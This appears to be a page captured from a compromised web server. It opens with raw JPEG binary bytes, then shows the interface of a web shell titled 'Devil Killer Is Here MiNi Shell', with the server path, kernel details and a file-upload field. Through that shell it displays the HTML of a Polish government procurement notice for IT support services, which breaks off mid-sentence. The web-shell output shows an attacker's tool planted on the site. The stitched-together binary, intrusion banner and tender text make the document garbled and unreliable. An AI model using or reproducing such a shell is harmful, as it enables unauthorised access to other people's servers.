JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240206/0009399501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Obsługa informatyczna Głównego Urzędu Geodezji i Kartografii </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Główny Urząd Geodezji i Kartografii</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 012276098</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żurawia 6/12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-926</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dyr.generalny@gugik.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gugik.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Geodezja i kartografia </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Obsługa informatyczna Głównego Urzędu Geodezji i Kartografii </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8cbec21f-c4cf-11ee-bbfa-e29e26ebc6e1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00093995</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gugik.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Zamawiający dopuszcza możliwość przekazywania sobie przez Strony<br/>postępowania oświadczeń, wniosków, zawiadomień oraz informacji: za pośrednictwem Platformy znajdującej się pod adresem:<br/>https://gugik.ezamawiajacy.pl poprzez opcję „Zadaj pytanie” lub zakładkę „Korespondencja”.2. Oferty z załącznikami, oświadczenia, o których mowa w art. 125 ust. 1 ustawy oraz pełnomocnictwa do złożenia oferty przekazywane są wyłącznie za pośrednictwem Platformy.<br/>3. Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Głównego Urzędu Geodezji i Kartografii https://gugik.ezamawiajacy.pl lub bezpośrednio: https://oneplace.marketplanet.pl<br/>Szczegółowe informacje nt. przewidzianych środków komunikacji elektronicznej zawarte są w Rozdziale X Specyfikacji Warunków<br/>Zamówienia (SWZ).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje nt. wymagań technicznych i organizacyjnych zawarte są w Rozdziale X Specyfikacji Warunków Zamówienia (SWZ).</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://oneplace.marketplanet.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UEL 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1) administratorem Pani/Pana danych osobowych, pozyskanych dla potrzeb przeprowadzenia niniejszego postępowania, jest Główny Geodeta Kraju z siedzibą w Głównym Urzędzie Geodezji i Kartografii, 00 926 Warszawa, ul. Żurawia 6/12;<br/>2) kontakt do inspektora ochrony danych w Głównym Urzędzie Geodezji i Kartografii: iod@gugik.gov.pl tel. +48 22 66 18 435 ;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego o nr ref. BDG-ZP.2610.6.2024.BDG prowadzonego w trybie podstawowym, o którym mowa w art. 275 pkt 1 ustawy;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność, a jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, zamawiający przechowuje protokół postępowania wraz z załącznikami przez<br/>cały okres obowiązywania umowy w sprawie zamówienia publicznego;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO,<br/>8) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ,<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>2. Na podstawie art. 14 RODO zobowiązuje się wykonawców będących osobami prawnymi lub jednostkami organizacyjnymi nieposiadającymi osobowości prawnej, do przekazywania osobom, których dane osobowe pozyskali w celu udostępnienia Zamawiającemu dla potrzeb przeprowadzenia niniejszego postępowania, treści obowiązku informacyjnego Zamawiającego, o którym mowa w ust. 1.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BDG-ZP.2610.6.2024.BDG</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest obsługa informatyczna Głównego Urzędu Geodezji i Kartografii (GUGiK), obejmująca serwis infrastruktury teleinformatycznej pracującej na potrzeby biurowe w siedzibach GUGiK w Warszawie przy: ul. Żurawiej 6/12, ul. Króla Jana I Olbrachta 94B i w lokalu dodatkowym w Lesznowoli przy ul. Wojska Polskiego 85. Na infrastrukturę teleinformatyczną GUGiK składają się: serwery sieciowe, serwer telefonii analogowej, zespoły komputerowe PC, urządzenia peryferyjne, komputery przenośne (laptopy), tablety i inne urządzenia mobilne oparte na systemie Android, osprzęt sieciowy, sprzęt pomocniczy, oprogramowanie systemowe, oprogramowanie użytkowe, oprogramowanie zabezpieczające, oprogramowanie antywirusowe, oprogramowanie do zarządzania sprzętem, oprogramowanie do inwentaryzacji i monitoringu infrastruktury IT oraz do zarządzania nią, system Elektronicznego Zarządzania Dokumentacją (EZD), systemy finansowo-księgowe i kadrowo-płacowe, systemy bankowości elektronicznej, Informatyczny System Obsługi Budżetu Państwa Trezor. Obsługa informatyczna Zamawiającego polegała będzie m.in. na: administrowaniu ww. infrastrukturą; administrowaniu lokalną siecią komputerową; zapewnieniu bieżącej pomocy i wsparcia użytkownikom infrastruktury; bieżącym konfigurowaniu oprogramowania; podejmowaniu działań związanych z rozwiązywaniem problemów, które są sygnalizowane przez system; przeprowadzaniu bieżących testów bezpieczeństwa systemów informatycznych; wykonywaniu konserwacji i napraw sprzętu; instalowaniu nowo zakupionego sprzętu i oprogramowania na stanowiskach pracy; instalacji i konfiguracji serwerów i urządzeń sieciowych; usuwaniu awarii oprogramowania; uaktualnianiu oprogramowania; nadzorowaniu wykonywania usług teleinformatycznych świadczonych Zamawiającemu przez firmy trzecie, w szczególności dostawców usług internetowych; planowaniu potrzeb w dziedzinie sprzętu i oprogramowania, w tym systemowego w ramach optymalizacji parametrów pracy systemu; przygotowywaniu zakupów sprzętu i oprogramowania na potrzeby biurowe Zamawiającego; dbaniu o bezpieczeństwo sieci oraz integralność i poufność zgromadzonych danych i niezwłocznej reakcji na zagrożenia; archiwizacji danych znajdujących się na serwerach sieciowych; zapewnieniu bieżącej i codziennej obsługi serwisów internetowych Zamawiającego; wykonywaniu innych działań zapewniających sprawność i korzystanie z infrastruktury teleinformatycznej Zamawiającego; przygotowywaniu pisemnych informacji, opinii i analiz w zakresie infrastruktury teleinformatycznej Zamawiającego na potrzeby Kierownictwa Głównego Urzędu Geodezji i Kartografii; udziale w niezbędnych szkoleniach, konsultacjach i naradach związanych z realizacją przedmiotu zamówienia. <br/>SOPZ stanowi Załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50320000-4 - Usługi w zakresie napraw i konserwacji komputerów osobistych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72100000-6 - Usługi doradcze w zakresie sprzętu komputerowego</p> <p class="mb-0">72514300-4 - Usługi w zakresie konserwacji systemów komputerowych</p> <p class="mb-0">72600000-6 - Usługi doradcze i dodatkowe w zakresie sprzętu komputerowego</p> <p class="mb-0">72611000-6 - Usługi w zakresie wsparcia technicznego</p> <p class="mb-0">72710000-0 - Usługi w zakresie lokalnej sieci komputerowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Szczegółowy opis sposobu oceny ofert określa rozdział XVI SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób realizujących zamówienie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, spełniający następujące warunki udziału w postępowaniu: <br/>1)	w zakresie zdolności do występowania w obrocie gospodarczym - w odniesieniu do tego warunku Zamawiający nie określa minimalnych poziomów zdolności;<br/>2)	w zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - w odniesieniu do tego warunku Zamawiający nie określa minimalnych poziomów zdolności;<br/>3)	w zakresie sytuacji ekonomicznej lub finansowej - w odniesieniu do tego warunku Zamawiający nie określa minimalnych poziomów zdolności;<br/>4)	w zakresie zdolności technicznej i zawodowej - w odniesieniu do tego warunku w postępowaniu mogą wziąć udział Wykonawcy którzy:<br/>a)	wykażą się doświadczeniem należytego wykonania w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej 2 (dwóch) świadczonych przez okres minimum 24 miesięcy usług polegających na: administrowaniu siecią, serwerami i systemami komputerowymi opartymi na takich samych technologiach, pracującymi pod kontrolą oprogramowania systemowego tego samego typu, wykorzystującymi oprogramowanie zabezpieczające, sieciowe i użytkowe ,w tym jednej usługi, gdzie obsługiwał minimum 150 użytkowników (osób) pracujących w minimum dwóch obiektach (budynkach) o zintegrowanej sieci teleinformatycznej z dostępem zdalnym z użyciem technologii VPN. Pojęcie ,,takich samych technologii, pracujących pod kontrolą oprogramowania systemowego tego samego typu” Zamawiający definiuje w pkt 2 szczegółowego opisu przedmiotu zamówienia (SOPZ).<br/>UWAGA: <br/>Wykonawca w wykazie usług zobowiązany jest podać tylko te główne usługi, które potwierdzają spełnienie warunków udziału w postępowaniu. <br/>W przypadku, gdy wymagane usługi są częścią większych zamówień dotyczących szerszego zakresu prac, należy bezwzględnie podać jedynie zakres dotyczący wymaganego asortymentu prac i tylko te prace należy wymienić. Zamawiający wymaga, aby Wykonawca wskazał konkretne usługi na potwierdzenie spełnienia powyższego warunku<br/>Zamawiający wymaga, aby Wykonawca wskazał konkretne usługi na potwierdzenie spełnienia powyższego warunku.<br/>b)	będą dysponować na etapie realizacji zamówienia, co najmniej trzema (3) osobami zdolnymi do wykonania przedmiotu zamówienia, z których każda posiada co najmniej 24 miesięczne doświadczenie i poniższe kompetencje w zakresie administrowania siecią, siecią i systemami komputerowymi pracującymi pod kontrolą oprogramowania systemowego, wykorzystującym oprogramowanie zabezpieczające, sieciowe i użytkowe, gdzie obsługiwał minimum 100 użytkowników w okresie ostatnich trzech lat przed upływem terminu składania ofert, gdzie był odpowiedzialny za wykonywanie co najmniej dwóch zamówień (usług):<br/>i.	wykształcenie wyższe informatyczne,<br/>ii.	znajomość języka angielskiego w stopniu umożliwiającym czytanie dokumentacji technicznej, kontakt telefoniczny i e-mailowy z firmami świadczącymi wsparcie techniczne,<br/>iii.	znajomość systemów operacyjnych z rodziny Microsoft Windows XP, Vista, 7, 8.1, 10 oraz MAC OS X, na poziomie administratora,<br/>iv.	znajomość systemów operacyjnych sieciowych z rodziny Microsoft Windows Server w wersjach 2003, 2008, 2008 R2, 2012 R2, 2016<br/>i 2019 oraz sieci zbudowanych na bazie tych systemów, na poziomie administratora,<br/>v.	znajomość oprogramowania i technik wirtualizacji opartych na platformie VMware ESXi i Microsoft Hyper-V,<br/>vi.	znajomość systemów Linux na poziomie administratora,<br/>vii.	znajomość urządzeń mobilnych opartych na systemie Google Android na poziomie administracji i zarządzania,<br/>viii.	znajomość zagadnień związanych z administrowaniem sieciami informatycznymi LAN, WAN, VPN na poziomie administratora<br/>i doświadczenie w tym zakresie,<br/>ix.	znajomość zagadnień związanych z zestawianiem tuneli VPN za pomocą protokołów IPsec oraz SSL w ujęciu server to server i server to client,<br/>x.	znajomość zagadnień związanych z użytkowaniem podstawowych aplikacji biurowych (przede wszystkim Microsoft Office 2003/2007/2010/2013/2016/2019) na poziomie administratora<br/>i doświadczenie w tym zakresie,<br/>xi.	znajomość zagadnień związanych z ochroną antywirusową i centralną administracją oprogramowaniem antywirusowym w sieciach lokalnych na poziomie administratora (przede wszystkim Eset) i doświadczenie w tym zakresie,<br/>xii.	znajomość zagadnień związanych z wykonywaniem kopii bezpieczeństwa serwerów i obsługą oprogramowania przeznaczonego do tego celu na poziomie administratora (przede wszystkim Symantec Backup Exec 12 i 2010, Tanberg Data AccuVault) i doświadczenie w tym zakresie,<br/>xiii.	znajomość zagadnień związanych z administracją systemami zabezpieczeń na styku sieci lokalnej z Internetem na poziomie administratora (przede wszystkim Microsoft ISA Server 2006<br/>i Fortigate) i doświadczenie w tym zakresie,<br/>xiv.	znajomość funkcjonowania sprzętu komputerowego (przede wszystkim stacji roboczych i serwerów) i podstawowych urządzeń peryferyjnych oraz sposobów ich serwisowania na poziomie administratora<br/>i doświadczenie w tym zakresie,<br/>xv.	znajomość języków: PHP, CSS, HTML, XHTML,<br/>xvi.	znajomość języka SQL oraz baz danych typu Microsoft Access oraz MySQL, PostrgreSQL,<br/>xvii.	wiedzę specjalistyczną z zakresu administrowania systemami CMS w szczególności Squiz Matrix CMS,<br/>xviii.	znajomość obsługi administracyjnej, użytkowania jako sieciowy serwer skanowania i wydruków maszyn wielofunkcyjnych, takich jak: Fiery Digital Print, Konica Minolta bizhub 250/223, Konica Minolta 7xxx, Develop Ineo 2xx/3xx, Xerox Work Centre 6655, Xerox B7030/C7030,<br/>xix.	biegłą znajomość kwestii bezpieczeństwa dostępu do sieci WiFi i administracyjna znajomość autoryzacji klientów poprzez RADIUS,<br/>xx.	biegłą znajomość oprogramowania do monitoringu, zarządzania i inwentaryzacji infrastruktury IT – Spiceworks,<br/>xxi.	znajomość systemów MAC OS X oraz komputerów marki Apple,<br/>xxii.	znajomość oprogramowania do zarządzania kontrolą dostępu na poziomie administratora,<br/>xxiii.	znajomość technologii zewnętrznych macierzy dyskowych NAS i SAN oraz technologii iSCSI,<br/>xxiv.	doświadczenie w przygotowywaniu dokumentów dotyczących integralności danych i polityk bezpieczeństwa,<br/>xxv.	doświadczenie w przygotowywaniu specyfikacji i opisu konfiguracji sprzętu w ramach:<br/>-	postępowań o zamówienia publiczne z zastosowaniem przepisów ustawy Pzp jak i spoza tej ustawy,<br/>-	zamówień centralnych i wspólnych prowadzonych przez Centrum Obsługi Administracji Rządowej,<br/>xxvi.	co najmniej 5 letnie doświadczenie w administrowaniu systemami (na poziomie administratora) oraz świadczeniu bezpośredniego wsparcia dla użytkowników systemów: Elektronicznego Zarzadzania Dokumentacją (EZD PUW), poczty email MS Exchange 2013/2016<br/>i Postfix, telefonii VoIP Asterisk, QNT Quorum, Moodle,<br/>xxvii.	znajomość narzędzi Fortianalyzer,<br/>xxviii.	znajomość obsługi usług katalogowych Microsoft Active Directory<br/>i OpenLDAP,<br/>xxix.	umiejętność przeprowadzania wewnętrznych audytów bezpieczeństwa oraz testów penetracyjnych w sieciach LAN;<br/>c)	będą dysponować na etapie realizacji zamówienia, co najmniej jedną (1) osobą która:<br/>i.	posiada kompetencje z zakresu MATR101 - Squiz Matrix Fundamentals,<br/>ii.	posiada kompetencje z zakresu MATR201 - Squiz Matrix System Administration,<br/>iii.	posiada kompetencje z zakresu MATR210 - Squiz Matrix Advanced Assets,<br/>iv.	posiada kompetencje z zakresu MATR330 - Squiz Matrix Designs.<br/>Uwaga: Zamawiający dopuszcza, aby jedna ze wskazanych przez Wykonawcę osób spełniająca wymagania wymienione w ust. 1 pkt 4 lit. b, pełniła jednocześnie rolę osoby określonej w ust. 1 pkt 4 lit. c. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Każdy Wykonawca, wraz z ofertą, zobowiązany jest złożyć oświadczenie, aktualne na dzień składania ofert, że nie podlega wykluczeniu z postępowania w zakresie podstaw wykluczenia określonych w art. 108 ust. 1 pkt 1-6, art. 109 ust. 1 pkt 4 ustawy 